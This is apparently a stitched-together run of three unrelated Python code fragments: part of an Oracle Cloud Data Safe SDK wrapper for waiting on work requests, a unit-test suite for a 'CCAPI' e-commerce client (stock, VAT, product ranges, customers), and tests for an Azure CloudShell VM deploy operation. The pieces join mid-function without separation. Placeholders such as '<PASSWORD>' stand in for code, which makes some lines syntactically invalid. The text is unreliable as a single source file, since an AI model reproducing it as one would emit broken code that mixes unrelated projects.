self.client.unset_security_assessment_baseline(security_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def unset_user_assessment_baseline_and_wait_for_state(self, user_assessment_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.unset_user_assessment_baseline` and waits for the :py:class:`~oci.data_safe.models.WorkRequest` to enter the given state(s). :param str user_assessment_id: (required) The OCID of the user assessment. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.data_safe.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.data_safe.DataSafeClient.unset_user_assessment_baseline` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. 
For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait """ operation_result = self.client.unset_user_assessment_baseline(user_assessment_id, **operation_kwargs) if not wait_for_states: return operation_result lowered_wait_for_states = [w.lower() for w in wait_for_states] wait_for_resource_id = operation_result.headers['opc-work-request-id'] try: waiter_result = oci.wait_until( self.client, self.client.get_work_request(wait_for_resource_id), evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states, **waiter_kwargs ) result_to_return = waiter_result return result_to_return except Exception as e: raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e) def update_alert_and_wait_for_state(self, alert_id, update_alert_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}): """ Calls :py:func:`~oci.data_safe.DataSafeClient.update_alert` and waits for the :py:class:`~oci.data_safe.models.Alert` acted upon to enter the given state(s). :param str alert_id: (required) The OCID of alert. :param oci.data_safe.models.UpdateAlertDetails update_alert_details: (required)
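# Illustrative usage sketch (not from the SDK source above): how a composite
# "..._and_wait_for_state" helper like the ones defined here is typically called.
# The OCID and terminal states below are placeholders; confirm the valid
# oci.data_safe.models.WorkRequest status values for your SDK version.
import oci

def _example_stop_audit_trail(audit_trail_ocid: str) -> None:
    config = oci.config.from_file()  # reads the default ~/.oci/config profile
    client = oci.data_safe.DataSafeClient(config)
    composite = oci.data_safe.DataSafeClientCompositeOperations(client)
    work_request = composite.stop_audit_trail_and_wait_for_state(
        audit_trail_ocid,
        wait_for_states=["SUCCEEDED", "FAILED"],
        waiter_kwargs={"max_wait_seconds": 600},
    )
    print(work_request.data.status)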
self.assertDataSent("ProductID", self.PRODUCT_ID) def test_passed_new_stock_level_is_sent(self): """Test the passed new stock level is sent.""" self.assertDataSent("newStockLevel", self.NEW_STOCK_LEVEL) def test_passed_old_stock_level_is_sent(self): """Test the passed old stock level is sent.""" self.assertDataSent("oldStockLevel", self.OLD_STOCK_LEVEL) class Test_set_product_vat_rate_Method(TestCCAPIMethod): """Test the CCAPI.set_product_vat_rate method.""" RESPONSE = test_requests.TestUpdateProductVatRate.RESPONSE PRODUCT_IDS = ["123654", "6909316"] VAT_RATE = 20 VAT_RATE_ID = VatRates.get_vat_rate_id_by_rate(VAT_RATE) def setUp(self): """Make test request.""" super().setUp() self.register_request(requests.UpdateProductVatRate, text=self.RESPONSE) def test_passed_product_ID_is_sent(self): """Test that the passed product IDs are sent.""" CCAPI.set_product_vat_rate(product_ids=self.PRODUCT_IDS, vat_rate=self.VAT_RATE) sent_data = self.get_sent_request_data() for product_id in self.PRODUCT_IDS: self.assertIn(product_id, str(sent_data["prodids"])) def test_passing_single_product_ID_as_string(self): """Test passing a single product ID as a string.""" CCAPI.set_product_vat_rate( product_ids=self.PRODUCT_IDS[0], vat_rate=self.VAT_RATE ) sent_data = self.get_sent_request_data() self.assertIn(self.PRODUCT_IDS[0], str(sent_data["prodids"])) def test_vat_rate_ID_is_sent(self): """Test the correct VAT rate ID is sent.""" CCAPI.set_product_vat_rate(product_ids=self.PRODUCT_IDS, vat_rate=self.VAT_RATE) self.assertDataSent("vatrate", self.VAT_RATE_ID) class Test_upload_image_Method(TestCCAPIMethod): """Test the CCAPI.upload_image method.""" RESPONSE = test_requests.TestUploadImage.SUCCESSFUL_RESPONSE PRODUCT_IDS = ["123654", "6909316"] IMAGE = test_requests.TestUploadImage.IMAGE def setUp(self): """Make test request.""" super().setUp() self.register_request(requests.UploadImage, json=self.RESPONSE) def test_passed_product_ID_is_sent(self): """Test that the passed product IDs are sent.""" CCAPI.upload_image(product_ids=self.PRODUCT_IDS, image_file=self.IMAGE) sent_data = self.get_sent_request_query() for product_id in self.PRODUCT_IDS: self.assertIn(product_id, str(sent_data["prodids"])) def test_passing_single_product_ID_as_string(self): """Test passing a single product ID as a string.""" CCAPI.upload_image(product_ids=self.PRODUCT_IDS, image_file=self.IMAGE) sent_data = self.get_sent_request_query() self.assertIn(self.PRODUCT_IDS[0], str(sent_data["prodids"])) class Test_create_range_Method(TestCCAPIMethod): """Test the CCAPI.create_range method.""" RANGE_ID = "4940634" GET_SKU_RESPONSE = test_requests.TestProductOperations.GENERATE_SKU_RESPONSE RANGE_NAME = "New Product Range" SKU = "JF8-98D-3KD" def setUp(self): """Register request URIs.""" super().setUp() self.register_request(requests.AddNewRange, text=self.RANGE_ID) self.register_request(requests.ProductOperations, json=self.GET_SKU_RESPONSE) def test_create_range_returns_a_range_ID(self): """Test the CCAPI.create_range method returns a range ID.""" response = CCAPI.create_range(self.RANGE_NAME, self.SKU) self.assertEqual(response, self.RANGE_ID) def test_create_range_sends_range_name(self): """Test the CCAPI.create_range method sends a range name.""" CCAPI.create_range(self.RANGE_NAME, self.SKU) self.assertDataSent("RangeName", self.RANGE_NAME) def test_create_range_sends_SKU(self): """Test the CCAPI.create_range method sends a SKU.""" CCAPI.create_range(self.RANGE_NAME, self.SKU) self.assertDataSent("SKUCode", self.SKU) def 
test_gets_generated_SKU(self): """Test a request is made for a new SKU.""" CCAPI.create_range(self.RANGE_NAME) self.assertRequestUsesRequestClassURI( requests.ProductOperations, self.get_sent_request(skip=2) ) def test_generated_SKU_is_used(self): """Test that the generated SKU is sent.""" CCAPI.create_range(self.RANGE_NAME) self.assertDataSent("SKUCode", "RNG_" + self.GET_SKU_RESPONSE["Data"]) class Test_add_option_to_product_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.add_option_to_product method.""" RESPONSE = test_requests.TestAddRemProductOption.RESPONSE RANGE_ID = "4940634" OPTION_ID = "32131" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.AddRemProductOption, text=self.RESPONSE) CCAPI.add_option_to_product(range_id=self.RANGE_ID, option_id=self.OPTION_ID) def test_add_option_to_product_sends_range_ID(self): """Test the CCAPI.add_option_to_product method sends a Range ID.""" self.assertDataSent("prdid", self.RANGE_ID) def test_add_option_to_product_sends_option_ID(self): """Test the CCAPI.add_option_to_product method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_add_option_to_product_sends_act(self): """Test the CCAPI.add_option_to_product method sends a correct act.""" self.assertDataSent("act", "add") class Test_remove_option_from_product_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.remove_option_from_product method.""" RESPONSE = test_requests.TestAddRemProductOption.RESPONSE RANGE_ID = "4940634" OPTION_ID = "32131" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.AddRemProductOption, text=self.RESPONSE) CCAPI.remove_option_from_product( range_id=self.RANGE_ID, option_id=self.OPTION_ID ) def test_remove_option_from_product_sends_range_ID(self): """Test the remove_option_from_product method sends a Range ID.""" self.assertDataSent("prdid", self.RANGE_ID) def test_remove_option_from_product_sends_option_ID(self): """Test the remove_option_from_product method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_remove_option_from_product_sends_act(self): """Test the remove_option_from_product method sends a correct act.""" self.assertDataSent("act", "rem") class Test_get_sales_channels_for_range_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.get_sales_channels_for_range method.""" RESPONSE = test_data.CHECK_RANGES_ON_SALES_CHANNEL_RESULT RANGE_ID = "4940634" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.CheckRangesOnSalesChannel, json=self.RESPONSE) def test_get_sales_channels_for_range_sends_range_id(self): """Test the method uses the correct request class.""" CCAPI.get_sales_channels_for_range(self.RANGE_ID) self.assertDataSent("rangeid", self.RANGE_ID) def test_get_sales_channel_for_range_returns_list(self): """Test the method returns a list.""" response = CCAPI.get_sales_channels_for_range(self.RANGE_ID) self.assertIsInstance(response, list) def test_get_sales_channel_for_range_returns_sales_channels(self): """Test the method returns a list.""" response = CCAPI.get_sales_channels_for_range(self.RANGE_ID) self.assertIsInstance(response[0], cc_objects.SalesChannel) class Test_delete_range_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.delete_range method.""" RESPONSE = test_requests.TestDeleteProductRange.RESPONSE RANGE_ID = "4940634" def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.DeleteProductRange, text=self.RESPONSE) 
CCAPI.delete_range(self.RANGE_ID) def test_delete_range_sends_range_id(self): """Test the delete_range method sends the passed range ID.""" self.assertDataSent("ProdRangeID", self.RANGE_ID) class Test_set_range_option_drop_down_Method(TestCCAPIMethod): """Test the ccapi.CCAPI.set_range_option_drop_down method.""" RESPONSE = test_requests.TestSetOptionSelect.RESPONSE RANGE_ID = "4355752" OPTION_ID = "32129" DROP_DOWN = True def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.SetOptionSelect, text=self.RESPONSE) CCAPI.set_range_option_drop_down( range_id=self.RANGE_ID, option_id=self.OPTION_ID, drop_down=self.DROP_DOWN ) def test_sends_range_ID(self): """Test the set_range_option_drop_down method sends a range ID.""" self.assertDataSent("prdid", self.RANGE_ID) def test_sends_option_ID(self): """Test the set_range_option_drop_down method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_sends_drop_down_status(self): """Test the method sends a drop down status.""" self.assertDataSent("onoff", int(self.DROP_DOWN)) class Test_update_range_on_sales_channel_Method(TestCCAPIMethod): """Test the update_range_on_sales_channel method.""" RESPONSE = [] RANGE_ID = "4355752" REQUEST_TYPE = "select" ACT = "update" VALUE = "Test Value" OPTION_ID = "32129" CHANNEL_IDS = ["3541", "3557"] def setUp(self): """Register request URI and call method.""" super().setUp() self.register_request(requests.UpdateRangeOnSalesChannel, json=self.RESPONSE) CCAPI.update_range_on_sales_channel( range_id=self.RANGE_ID, request_type=self.REQUEST_TYPE, act=self.ACT, value=self.VALUE, option_id=self.OPTION_ID, channel_ids=self.CHANNEL_IDS, ) def test_update_range_on_sales_channel_method_sends_range_ID(self): """Test the update_range_on_sales_channel method sends a range ID.""" self.assertDataSent("rangeid", self.RANGE_ID) def test_update_range_on_sales_channel_method_sends_request_type(self): """Test update_range_on_sales_channel method sends a request type.""" self.assertDataSent("type", self.REQUEST_TYPE) def test_update_range_on_sales_channel_method_sends_act(self): """Test the update_range_on_sales_channel method sends an act.""" self.assertDataSent("act", self.ACT) def test_update_range_on_sales_channel_method_sends_value(self): """Test the update_range_on_sales_channel method sends a value.""" self.assertDataSent("val", self.VALUE) def test_update_range_on_sales_channel_method_sends_option_ID(self): """Test the update_range_on_sales_channel method sends an option ID.""" self.assertDataSent("optid", self.OPTION_ID) def test_update_range_on_sales_channel_method_sends_channel_IDs(self): """Test the update_range_on_sales_channel method sends channel IDs.""" self.assertDataSent("chans", self.CHANNEL_IDS) def test_update_range_on_sales_channel_method_sends_brand_ID(self): """Test the update_range_on_sales_channel method sends a brand ID.""" self.assertDataSent("brandid", 341) class Testupdate_range_settings_method(TestCCAPIMethod): """Test the ccapi.CCAPI.update_range_settings method.""" RESPONSE = '"OK"' RANGE_ID = "4355752" CURRENT_NAME = "Test Move Department 2" CURRENT_SKU = "RNG_UYV-3SP-W60" CURRENT_END_OF_LINE = False CURRENT_PRE_ORDER = False CURRENT_GROUP_ITEMS = False NEW_NAME = "Test Move Department 2" NEW_SKU = "RNG_UYV-3SP-W60" NEW_END_OF_LINE = "0" NEW_PRE_ORDER = False NEW_GROUP_ITEMS = False CHANNELS = ["3541", "3557"] def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.UpdateRangeSettings, text=self.RESPONSE) 
CCAPI.update_range_settings( range_id=self.RANGE_ID, current_name=self.CURRENT_NAME, current_sku=self.CURRENT_SKU, current_end_of_line=self.CURRENT_END_OF_LINE, current_pre_order=self.CURRENT_PRE_ORDER, current_group_items=self.CURRENT_GROUP_ITEMS, new_name=self.NEW_NAME, new_sku=self.NEW_SKU, new_end_of_line=self.NEW_END_OF_LINE, new_pre_order=self.NEW_PRE_ORDER, new_group_items=self.NEW_GROUP_ITEMS, channels=self.CHANNELS, ) def test_update_range_settings_sends_range_id(self): """Test the method sends the passed range ID.""" self.assertJsonValueSent("rangeID", self.RANGE_ID) def test_update_range_settings_sends_current_name(self): """Test the method sends the passed current name.""" self.assertJsonValueSent("currName", self.CURRENT_NAME) def test_update_range_settings_sends_current_sku(self): """Test the method sends the passed current SKU.""" self.assertJsonValueSent("currSKU", self.CURRENT_SKU) def test_update_range_settings_sends_current_end_of_line(self): """Test the method sends the passed current end of line.""" self.assertJsonValueSent("currEoL", int(self.CURRENT_END_OF_LINE)) def test_update_range_settings_sends_current_pre_order(self): """Test the method sends the passed current pre order.""" self.assertJsonValueSent("currPreO", int(self.CURRENT_PRE_ORDER)) def test_update_range_settings_sends_current_group_items(self): """Test the method sends the passed current group items.""" self.assertJsonValueSent("currGBy", str(int(self.CURRENT_GROUP_ITEMS))) def test_update_range_settings_sends_new_name(self): """Test the method sends the passed new name.""" self.assertJsonValueSent("newName", self.NEW_NAME) def test_update_range_settings_sends_new_sku(self): """Test the method sends the passed new SKU.""" self.assertJsonValueSent("newSKU", self.NEW_SKU) def test_update_range_settings_sends_new_end_of_line(self): """Test the method sends the passed new end of line.""" self.assertJsonValueSent("newEoL", str(int(self.NEW_END_OF_LINE))) def test_update_range_settings_sends_new_pre_order(self): """Test the method sends the passed new pre order.""" self.assertJsonValueSent("newPreO", str(int(self.NEW_PRE_ORDER))) def test_update_range_settings_sends_new_group_items(self): """Test the method sends the passed new group items.""" self.assertJsonValueSent("newGBy", str(int(self.NEW_GROUP_ITEMS))) def test_update_range_settings_sends_channels(self): """Test the method sends the passed channels.""" self.assertJsonValueSent("channels", self.CHANNELS) def test_update_range_settings_sends_brand_id(self): """Test the method sends the passed brand ID.""" self.assertJsonValueSent("brandID", 341) class Test_add_customer_Method(TestCCAPIMethod): """Test the ccapi.add_customer_method.""" CUSTOMER_ID = test_requests.test_handlers.TestAddCustomer.CUSTOMER_ID RESPONSE = test_requests.test_handlers.TestAddCustomer.RESPONSE ACCOUNT_NAME = "<NAME>" ADDRESS_1 = "1 Way Street" ADDRESS_2 = "Villageton" AGENT_ID = 3 COMPANY_FAX = "02135 465135" COMPANY_MOBILE = "09135 453 901" COMPANY_TELEPHONE = "132485 63156" CONTACT_EMAIL = "<EMAIL>" CONTACT_FAX = "15441 8464 6541" CONTACT_MOBILE = "09874 751 665" CONTACT_NAME = "Contact Test Customer" CONTACT_PHONE = "01324 164861" COUNTRY = "United Kingdom" COUNTY = "Townshire" CUSTOMER_NAME = "<NAME>" CUSTOMER_TYPE = 6 EU_VAT = False POST_CODE = "ES23 5LN" PAYMENT_TERMS = 3 SELLING_CHANNEL_ID = "3541" SPECIAL_INSTRUCTIONS_NOTE = "Leave packages in Porch." TOWN = "Townsville" TRADE_NAME = "Shop Co." 
VAT_NUMBER = "8759453" CREDIT_LIMIT = 7 def setUp(self): """Register request URI.""" super().setUp() self.register_request(requests.handlers.AddCustomer, text=self.RESPONSE) self.returned_value = CCAPI.add_customer( customer_name=self.CUSTOMER_NAME, address_1=self.ADDRESS_1, country=self.COUNTRY, selling_channel_id=self.SELLING_CHANNEL_ID, address_2=self.ADDRESS_2, town=self.TOWN, post_code=self.POST_CODE, account_name=self.ACCOUNT_NAME, agent_id=self.AGENT_ID, company_fax=self.COMPANY_FAX, company_mobile=self.COMPANY_MOBILE, company_telephone=self.COMPANY_TELEPHONE, contact_email=self.CONTACT_EMAIL, contact_fax=self.CONTACT_FAX, contact_name=self.CONTACT_NAME, contact_phone=self.CONTACT_PHONE, contact_mobile=self.CONTACT_MOBILE, county=self.COUNTY, customer_type=self.CUSTOMER_TYPE, eu_vat=self.EU_VAT, payment_terms=self.PAYMENT_TERMS, trade_name=self.TRADE_NAME, vat_number=self.VAT_NUMBER, special_instructions=self.SPECIAL_INSTRUCTIONS_NOTE, credit_limit=self.CREDIT_LIMIT, ) def test_add_customer_returns_customer_ID(self): """Test the add_customer method of CCAPI returns a customer ID.""" self.assertEqual(self.returned_value, self.CUSTOMER_ID) def test_add_customer_sends_account_name(self): """Test the add_customer method sends an account name.""" self.assertDataSent("AcctName", self.ACCOUNT_NAME) def test_add_customer_sends_address_1(self): """Test the add_customer method sends the first line of the address.""" self.assertDataSent("addr1", self.ADDRESS_1) def test_add_customer_sends_address_2(self): """Test the add_customer method sends the second line of the address.""" self.assertDataSent("addr2", self.ADDRESS_2) def test_add_customer_sends_agent_ID(self): """Test the add_customer method sends the agent ID.""" self.assertDataSent("agentID", self.AGENT_ID) def test_add_customer_sends_company_fax(self): """Test the add_customer method sends the company fax.""" self.assertDataSent("compFax", self.COMPANY_FAX) def test_add_customer_sends_company_mobile(self): """Test the add_customer method sends the company mobile.""" self.assertDataSent("compMob", self.COMPANY_MOBILE) def test_add_customer_sends_company_telephone(self): """Test the add_customer method sends the company telephone.""" self.assertDataSent("compTel", self.COMPANY_TELEPHONE) def test_add_customer_sends_contact_email(self): """Test the add_customer method sends the contact email.""" self.assertDataSent("contEmail", self.CONTACT_EMAIL) def test_add_customer_sends_contact_fax(self): """Test the add_customer method sends the contact fax.""" self.assertDataSent("contFax", self.CONTACT_FAX) def test_add_customer_sends_contact_mobile(self): """Test the add_customer method sends the contact mobile.""" self.assertDataSent("contMob", self.CONTACT_MOBILE) def test_add_customer_sends_contact_name(self): """Test the add_customer method sends the contact name.""" self.assertDataSent("contName", self.CONTACT_NAME) def test_add_customer_sends_contact_phone(self): """Test the add_customer method sends the contact phone.""" self.assertDataSent("contPhone", self.CONTACT_PHONE) def test_add_customer_sends_country(self): """Test the add_customer method sends the country.""" self.assertDataSent("country", self.COUNTRY) def test_add_customer_sends_county(self): """Test the add_customer method sends the county.""" self.assertDataSent("county", self.COUNTY) def test_add_customer_sends_customer_name(self): """Test the add_customer method sends the customer name.""" self.assertDataSent("CustName", self.CUSTOMER_NAME) def 
test_add_customer_sends_customer_type(self): """Test the add_customer method sends the customer type.""" self.assertDataSent("CustType", self.CUSTOMER_TYPE) def test_add_customer_sends_EU_VAT(self): """Test the add_customer method sends the EU VAT.""" self.assertDataSent("EUVAT", int(bool(self.EU_VAT))) def test_add_customer_sends_post_code(self): """Test the
from unittest import TestCase from azure.mgmt.compute.models import OperatingSystemTypes from mock import MagicMock from mock import Mock from cloudshell.cp.azure.domain.services.network_service import NetworkService from cloudshell.cp.azure.domain.services.storage_service import StorageService from cloudshell.cp.azure.domain.services.tags import TagService from cloudshell.cp.azure.domain.services.virtual_machine_service import VirtualMachineService from cloudshell.cp.azure.domain.vm_management.operations.deploy_operation import DeployAzureVMOperation from cloudshell.cp.azure.models.azure_cloud_provider_resource_model import AzureCloudProviderResourceModel from cloudshell.cp.azure.models.deploy_azure_vm_resource_models import DeployAzureVMResourceModel from cloudshell.cp.core.models import Attribute class TestDeployAzureVMOperation(TestCase): def setUp(self): self.logger = Mock() self.storage_service = MagicMock() self.vm_service = VirtualMachineService(MagicMock()) self.network_service = NetworkService(MagicMock(), MagicMock()) self.vm_credentials_service = Mock() self.key_pair_service = Mock() self.security_group_service = MagicMock() self.tags_service = TagService() self.name_provider_service = MagicMock() self.vm_extension_service = MagicMock() self.generic_lock_provider = MagicMock() self.cancellation_service = MagicMock() self.image_data_factory = MagicMock() self.vm_details_provider = MagicMock() self.deploy_operation = DeployAzureVMOperation(vm_service=self.vm_service, network_service=self.network_service, storage_service=self.storage_service, vm_credentials_service=self.vm_credentials_service, key_pair_service=self.key_pair_service, tags_service=self.tags_service, security_group_service=self.security_group_service, name_provider_service=self.name_provider_service, vm_extension_service=self.vm_extension_service, generic_lock_provider=self.generic_lock_provider, cancellation_service=self.cancellation_service, image_data_factory=self.image_data_factory, vm_details_provider=self.vm_details_provider) def test_get_sandbox_subnet(self): """Check that method will call network service to get sandbox vNet and will return it's subnet by given name""" network_client = MagicMock() cloud_provider_model = MagicMock() subnet_name = "testsubnetname" sandbox_subnet = MagicMock() sandbox_subnet.name = subnet_name self.network_service.get_sandbox_virtual_network = MagicMock( return_value=MagicMock(subnets=[MagicMock(), MagicMock(), sandbox_subnet])) # Act subnet = self.deploy_operation._get_sandbox_subnet( network_client=network_client, cloud_provider_model=cloud_provider_model, subnet_name=subnet_name, logger=self.logger) # Verify self.network_service.get_sandbox_virtual_network.assert_called_once_with( network_client=network_client, group_name=cloud_provider_model.management_group_name) self.assertEqual(subnet, sandbox_subnet) def test_get_sandbox_subnet_will_raise_no_valid_subnet_exception(self): """Check that method will raise Exception if there is no subnet with given name under the MGMT network""" network_client = MagicMock() cloud_provider_model = MagicMock() subnet_name = "testsubnetname" self.network_service.get_sandbox_virtual_network = MagicMock( return_value=MagicMock(subnets=[MagicMock(), MagicMock(), MagicMock()])) with self.assertRaisesRegexp(Exception, "Could not find a valid subnet."): self.deploy_operation._get_sandbox_subnet( network_client=network_client, cloud_provider_model=cloud_provider_model, subnet_name=subnet_name, logger=Mock()) def test_get_public_ip_address(self): 
"""Check that method will use network service to get Public IP by it's name""" network_client = MagicMock() azure_vm_deployment_model = MagicMock(add_public_ip=True) group_name = "testgroupname" ip_name = "testipname" expected_ip_addr = "10.10.10.10" public_ip = MagicMock(ip_address=expected_ip_addr) cancellation_context = MagicMock() self.network_service.get_public_ip = MagicMock(return_value=public_ip) # Act ip_addr = self.deploy_operation._get_public_ip_address( network_client=network_client, azure_vm_deployment_model=azure_vm_deployment_model, group_name=group_name, ip_name=ip_name, cancellation_context=cancellation_context, logger=self.logger) # Verify self.assertEqual(ip_addr, expected_ip_addr) def test_get_public_ip_address_add_public_ip_is_false(self): """Check that method will return None if "add_public_ip" attribute is False""" network_client = MagicMock() azure_vm_deployment_model = MagicMock(add_public_ip=False) group_name = "testgroupname" ip_name = "testipname" cancellation_context = MagicMock() self.network_service.get_public_ip = MagicMock() # Act ip_addr = self.deploy_operation._get_public_ip_address( network_client=network_client, azure_vm_deployment_model=azure_vm_deployment_model, group_name=group_name, ip_name=ip_name, cancellation_context=cancellation_context, logger=self.logger) # Verify self.assertIsNone(ip_addr) self.network_service.get_public_ip.assert_not_called() def test_deploy_vm_generic(self): """ This method verifies the basic deployment of vm. :return: """ # Arrange resource_model = DeployAzureVMResourceModel() data = Mock() updated_data = Mock() updated_data.vm_credentials = Mock() deployed_app_attributes = Mock() self.deploy_operation._prepare_deploy_data = Mock(return_value=data) self.deploy_operation._create_vm_common_objects = Mock(return_value=updated_data) self.deploy_operation._create_vm_custom_script_extension = Mock() self.deploy_operation._prepare_deployed_app_attributes = Mock(return_value=deployed_app_attributes) self.deploy_operation._get_public_ip_address = Mock(return_value="pub_ip_address") vm = Mock() create_vm_action = Mock(return_value=vm) cancellation_context = Mock() reservation = Mock() cloud_provider_model = Mock() logger = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cloudshell_session = Mock() # Act result = self.deploy_operation._deploy_vm_generic(create_vm_action=create_vm_action, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Verify self.assertEquals(self.cancellation_service.check_if_cancelled.call_count, 2) self.cancellation_service.check_if_cancelled.assert_called_with(cancellation_context) self.deploy_operation._prepare_deploy_data.assert_called_once_with( logger=logger, reservation=reservation, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, network_client=network_client, storage_client=storage_client, compute_client=compute_client) self.deploy_operation._create_vm_common_objects.assert_called_once_with( logger=logger, data=data, deployment_model=resource_model, cloud_provider_model=cloud_provider_model, network_client=network_client, storage_client=storage_client, cancellation_context=cancellation_context) create_vm_action.assert_called_once_with( deployment_model=resource_model, 
cloud_provider_model=cloud_provider_model, data=updated_data, compute_client=compute_client, cancellation_context=cancellation_context, logger=logger) self.deploy_operation._create_vm_custom_script_extension.assert_called_once_with( deployment_model=resource_model, cloud_provider_model=cloud_provider_model, compute_client=compute_client, data=updated_data, logger=logger, cancellation_context=cancellation_context) self.deploy_operation._get_public_ip_address.assert_called_once_with( network_client=network_client, azure_vm_deployment_model=resource_model, group_name=updated_data.group_name, ip_name=updated_data.ip_name, cancellation_context=cancellation_context, logger=logger) self.deploy_operation._prepare_deployed_app_attributes.assert_called_once_with( admin_username=updated_data.vm_credentials.admin_username, admin_password=<PASSWORD>, public_ip=updated_data.public_ip_address ) self.assertEquals(updated_data.public_ip_address, "pub_ip_address") self.assertEquals(result.vmName, updated_data.vm_name) self.assertEquals(result.vmUuid, vm.vm_id) self.assertEquals(result.deployedAppAttributes, deployed_app_attributes) self.assertEquals(result.deployedAppAddress, updated_data.private_ip_address) def test_deploy_from_custom_image(self): # Arrange expected_result = Mock() self.deploy_operation._deploy_vm_generic = Mock(return_value=expected_result) self.deploy_operation._create_vm_custom_image_action = Mock() azure_vm_deployment_model = Mock() cloud_provider_model = Mock() reservation = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cancellation_context = Mock() logger = Mock() cloudshell_session=Mock() # Act res = self.deploy_operation.deploy_from_custom_image( deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Assert self.assertEquals(expected_result, res) self.deploy_operation._deploy_vm_generic.assert_called_once_with( create_vm_action=self.deploy_operation._create_vm_custom_image_action, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, storage_client=storage_client, compute_client=compute_client, network_client=network_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) def test_deploy_from_marketplace(self): # Arrange expected_result = Mock() self.deploy_operation._deploy_vm_generic = Mock(return_value=expected_result) self.deploy_operation._create_vm_custom_image_action = Mock() azure_vm_deployment_model = Mock() cloud_provider_model = Mock() reservation = Mock() network_client = Mock() compute_client = Mock() storage_client = Mock() cancellation_context = Mock() logger = Mock() cloudshell_session=Mock() # Act res = self.deploy_operation.deploy_from_marketplace( deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, reservation=reservation, network_client=network_client, compute_client=compute_client, storage_client=storage_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) # Assert self.assertEquals(expected_result, res) self.deploy_operation._deploy_vm_generic.assert_called_once_with( create_vm_action=self.deploy_operation._create_vm_marketplace_action, deployment_model=azure_vm_deployment_model, 
cloud_provider_model=cloud_provider_model, reservation=reservation, storage_client=storage_client, compute_client=compute_client, network_client=network_client, cancellation_context=cancellation_context, logger=logger, cloudshell_session=cloudshell_session) def test_create_vm_custom_image_action(self): """Check deploy from custom Image operation""" # Arrange azure_vm_deployment_model = MagicMock() azure_vm_deployment_model.image_name = "some_image" azure_vm_deployment_model.image_resource_group = "image_group" cloud_provider_model = MagicMock() logger = MagicMock() compute_client = Mock() cancellation_context = MagicMock() data = Mock() data.group_name = "group" self.vm_service.create_vm_from_custom_image = Mock() # Act self.deploy_operation._create_vm_custom_image_action( compute_client=compute_client, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, data=data, cancellation_context=cancellation_context, logger=logger) # Verify self.cancellation_service.check_if_cancelled.assert_called_with(cancellation_context) self.cancellation_service.check_if_cancelled.assert_called() self.vm_service.create_vm_from_custom_image.assert_called_once_with( compute_management_client=compute_client, image_name=azure_vm_deployment_model.image_name, image_resource_group=azure_vm_deployment_model.image_resource_group, disk_type=azure_vm_deployment_model.disk_type, vm_credentials=data.vm_credentials, computer_name=data.computer_name, group_name=data.group_name, nic_id=data.nic.id, region=cloud_provider_model.region, vm_name=data.vm_name, tags=data.tags, vm_size=data.vm_size, cancellation_context=cancellation_context) def test_create_vm_marketplace_action(self): """Check deploy from custom Image operation""" # Arrange azure_vm_deployment_model = MagicMock() cloud_provider_model = MagicMock() logger = MagicMock() compute_client = Mock() cancellation_context = MagicMock() data = Mock() self.vm_service.create_vm_from_marketplace = Mock() # Act self.deploy_operation._create_vm_marketplace_action( compute_client=compute_client, deployment_model=azure_vm_deployment_model, cloud_provider_model=cloud_provider_model, data=data, cancellation_context=cancellation_context, logger=logger) # Verify self.vm_service.create_vm_from_marketplace.assert_called_once_with( compute_management_client=compute_client, image_offer=azure_vm_deployment_model.image_offer, image_publisher=azure_vm_deployment_model.image_publisher, image_sku=azure_vm_deployment_model.image_sku, image_version=azure_vm_deployment_model.image_version, disk_type=azure_vm_deployment_model.disk_type, vm_credentials=data.vm_credentials, computer_name=data.computer_name, group_name=data.group_name, nic_id=data.nic.id, region=cloud_provider_model.region, vm_name=data.vm_name, tags=data.tags, vm_size=data.vm_size, purchase_plan=data.image_model.purchase_plan, cancellation_context=cancellation_context) def test_deploy_vm_generic_delete_all_resources_on_error(self): """ Check that method will delete all created resources in case of any Exception occurs 